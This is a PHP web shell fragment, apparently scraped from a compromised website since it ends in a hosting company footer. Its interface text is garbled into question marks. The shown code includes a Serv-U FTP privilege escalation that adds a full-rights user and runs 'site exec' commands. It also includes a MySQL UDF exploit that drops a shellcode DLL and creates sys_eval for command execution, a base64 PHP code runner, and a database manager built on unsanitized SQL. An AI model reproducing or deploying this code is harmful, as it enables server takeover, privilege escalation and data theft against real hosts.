'; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10); $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; if(!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10); $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = "USER ".$_POST['user']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = "PASS ".$_POST['password']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "?????: site exec ".$_POST["SUCommand"]."
"; $recvbuf = @fgets($exp, 1024); echo "?????: $recvbuf
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "?????: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "?????: $recvbuf
"; @fclose($exp); } @fclose($sock); echo '

'; } break; case "phpcode": $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();"; if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode)); echo '

'); break; case "myexp": $MSG_BOX = '????DLL,?????.MYSQL?????root??,?????????DLL??.'; $info = '????'; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { @$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; $conn = mysql_connect($mhost.':'.$mport,$muser,$mpass); if($conn) { @mysql_select_db($mdata); /*************************************/ $str=mysql_get_server_info(); //echo 'MYSQL??:'.$str." "; if($str[2]>=1){ $sql="SHOW VARIABLES LIKE '%plugin_dir%'"; $row=mysql_query($sql,$conn); $rows=mysql_fetch_row($row); $pa=str_replace('\\','/',$rows[1]); $path=$pa.'/'.$BH; }else{ $path='C:/WINDOWS/'.$BH; } //$mpath=$path; if(!empty($mpath)) { $mpath=$mpath; }else{ $mpath=$path; } /*************************************/ if((!empty($_POST['outdll'])) && (!empty($mpath))) { $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);"; if(@mysql_query($query,$conn)) { $shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode(); $query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));"; if(@mysql_query($query,$conn)) { $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';'; if(@mysql_query($query,$conn)) { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function sys_eval returns string soname \''.$inpath.'\';'; $MSG_BOX = @mysql_query($query,$conn) ? '??DLL??' : '??DLL??'.mysql_error(); } else $MSG_BOX = '??DLL????'.mysql_error(); } else $MSG_BOX = '???????'; @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn); } else $MSG_BOX = '???????'; } if(!empty($_POST['runcmd'])) { $query = 'select sys_eval("'.$sqlcmd.'");'; $result = @mysql_query($query,$conn); if($result) { $k = 0; $info = NULL; while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;} $info = $infotmp; $MSG_BOX = '????'; } else $MSG_BOX = '????'; } } else $MSG_BOX = '??MYSQL??'; } print<<

{$MSG_BOX}

?? ?? ?? ?? ??

????(????) 64?MYSQL

?????MYSQL

{$info}

END; break; case "mysql_exec": if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) { if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass'])) { $cookietime = time() + 24 * 3600; setcookie('m_eanverhost',$_POST['mhost'],$cookietime); setcookie('m_eanverport',$_POST['mport'],$cookietime); setcookie('m_eanveruser',$_POST['muser'],$cookietime); setcookie('m_eanverpass',$_POST['mpass'],$cookietime); die('????,???...'); } } print<<

END; break; case "mysql_msg": $conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']); if($conn) { print<< function Delok(msg,gourl) { smsg = "?????[" + unescape(msg) + "]??"; if(confirm(smsg)){window.location = gourl;} window.location = gourl; } function Createok(ac) { if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);'; if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; return false; } END; html_base(); print<< END; $BOOL = false; $MSG_BOX = '??:'.$_COOKIE['m_eanveruser'].' ??:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' ??:'; $k = 0; $result = @mysql_query('select version();',$conn); while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} echo '

???:'; $result = mysql_query("SHOW DATABASES",$conn); while($db = mysql_fetch_array($result)){echo ' ['.$db['Database'].']';} echo '

'; if(isset($_GET['db'])) { mysql_select_db($_GET['db'],$conn); $_POST['nsql']=base64_decode($_POST['nsql']); if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '????' : '???? '.mysql_error();} if(is_array($_POST['insql'])) { $query = 'INSERT INTO '.$_GET['table'].' ('; foreach($_POST['insql'] as $var => $key) { $querya .= $var.','; $queryb .= '\''.addslashes($key).'\','; } $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');'; $MSG_BOX = mysql_query($query,$conn) ? '????' : '???? '.mysql_error(); } if(is_array($_POST['upsql'])) { $query = 'UPDATE '.$_GET['table'].' SET '; foreach($_POST['upsql'] as $var => $key) { $queryb .= $var.'=\''.addslashes($key).'\','; } $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';'; $MSG_BOX = mysql_query($query,$conn) ? '????' : '???? '.mysql_error(); } if(isset($_GET['del'])) { $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn); $good = mysql_fetch_assoc($result); $query = 'DELETE FROM '.$_GET['table'].' WHERE '; foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';} $where = $query.substr($queryc, 0, -4).';'; $MSG_BOX = mysql_query($where,$conn) ? '????' : '???? '.mysql_error(); } $action = '?eanver=mysql_msg&db='.$_GET['db']; if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '????' : '???? '.mysql_error();} if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];} if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert']; echo '

'; echo '

'.$MSG_BOX.'

'.$_GET['db'].' ---> '; if(isset($_GET['table'])) { echo ''.$_GET['table'].' '; echo '[??]

'; if(isset($_GET['edit'])) { if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; echo ''; } else { $query = 'SHOW COLUMNS FROM '.$_GET['table']; $result = mysql_query($query,$conn); $fields = array(); $pagesize=20; $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn)); $numrows=$row_num; $pages=intval($numrows/$pagesize); if ($numrows%$pagesize) $pages++; $offset=$pagesize*($page - 1); $page=$_GET['p']; if(!$page) $page=1; if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; echo ''; echo ''; while($row = @mysql_fetch_assoc($result)) { array_push($fields,$row['Field']); echo ''; } echo ''; if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;'; $result = mysql_query($query,$conn); $v = $p; while($text = @mysql_fetch_assoc($result)) { echo ''; foreach($fields as $row){echo '';} echo ''."\r\n";$v++; } echo '

??	'.$row['Field'].'
?? '; echo ' ??	'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'

'; $pagep=$page-1; $pagen=$page+1; echo "?? ".$row_num." ??? "; if($pagep>0) $pagenav.=" ?? ??? "; else $pagenav.=" ??? "; if($pagen<=$pages) $pagenav.=" ??? ??"; else $pagenav.=" ??? "; $pagenav.=" ? [".$page."/".$pages."] ? ??

Website Hosting & Maintenance by iTech Solutions, LLC